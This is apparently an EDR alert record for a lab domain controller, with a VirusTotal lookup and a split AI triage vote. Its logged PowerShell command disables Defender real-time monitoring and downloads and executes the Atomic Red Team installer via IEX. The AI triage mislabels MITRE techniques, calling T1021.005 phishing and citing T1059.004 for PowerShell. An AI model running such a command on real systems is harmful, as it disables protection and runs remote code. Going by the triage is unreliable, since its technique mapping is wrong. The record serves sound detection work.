{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 155828224,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8396,
        "THIS_ATOM": "d55d696523198bca24198fe369c2a848",
        "THREADS": 3,
        "TIMESTAMP": 1774364743439,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8396,
      "PROCESS_ID": 7484,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
      "event_time": 1774364744023,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2893,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "d55d696523198bca24198fe369c2a848",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "206ee127bfd4633f7821f3c569c2a84a"
    }
  },
  "detect_id": "e0d2d709-3aa4-4497-9316-bd0369c2a84a",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364746921,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
    "event_time": 1774364744023,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2893,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "d55d696523198bca24198fe369c2a848",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "206ee127bfd4633f7821f3c569c2a84a"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364747000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.775,
  "false_positive_reason": null,
  "investigation_questions": [
    "What user account was used to execute this process?",
    "Were there any prior attempts to access this host before this event?",
    "Is this a legitimate security testing environment or an actual compromised host?"
  ],
  "ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments reveal malicious intent: disabling antivirus monitoring, downloading code via IEX to an external URL, and executing offensive security testing scripts. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution chain.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs"
    },
    {
      "type": "external_url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1021.005 (Phishing)"
    }
  ],
  "mitre_techniques": [
    "T1021.005",
    "T1059.004"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host from the network immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the firewall level",
    "Review and disable any scheduled tasks or services that may have triggered this execution",
    "Perform forensic imaging of the affected system for malware analysis"
  ],
  "risk_score": 85,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell using IEX to download and execute code from an external GitHub repository. The command explicitly disables real-time monitoring and installs the Atomic Red Team framework for offensive security testing.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments reveal malicious intent: disabling antivirus monitoring, downloading code via IEX to an external URL, and executing offensive security testing scripts. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution chain.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.6\nA PowerShell process running from the expected System32 location with a command line that includes actions to modify security settings, disable antivirus, and download scripts from GitHub, indicating potential malicious intent despite the legitimate binary path.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known Windows system binary and signed, making it likely benign in isolation. However, the COMMAND_LINE shows suspicious activities such as changing execution policy, setting security protocols, installing package providers, disabling real-time monitoring, and downloading/invoking scripts from external sources, which are common in attacks. The HASH is Microsoft-signed, supporting legitimacy, but the context suggests possible obfuscation or red teaming.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 60% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.6,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}